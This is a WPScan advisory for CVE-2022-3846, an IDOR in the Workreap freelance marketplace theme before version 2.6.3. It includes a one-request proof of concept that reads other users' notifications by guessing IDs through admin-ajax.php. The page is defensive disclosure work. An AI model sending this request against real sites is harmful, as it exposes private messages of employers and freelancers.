WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Workreap - Freelance Marketplace and Directory < 2.6.3 - Subscriber+ Private Message Disclosure via IDOR

Description

The theme has a vulnerability with the notifications feature as it's possible to read any user's notification (employer or freelancer) as the notification ID is brute-forceable.

Proof of Concept

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 61

action=workreap_read_notification&id=6233&security=<nonce>

Affects Themes

workreap
Fixed in version 2.6.3

References

CVE
CVE-2022-3846

Classification

Type

IDOR

OWASP top 10
A5: Broken Access Control
CWE
CWE-639

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website
https://veshrajghimire.com.np
Submitter twitter
GhimireVeshraj
Verified

Yes

WPVDB ID
6220c7ef-69a6-49c4-9c56-156b945446af

Timeline

Publicly Published

2022-11-12 (about 6 months ago)

Added

2022-11-11 (about 6 months ago)

Last Updated

2022-11-11 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin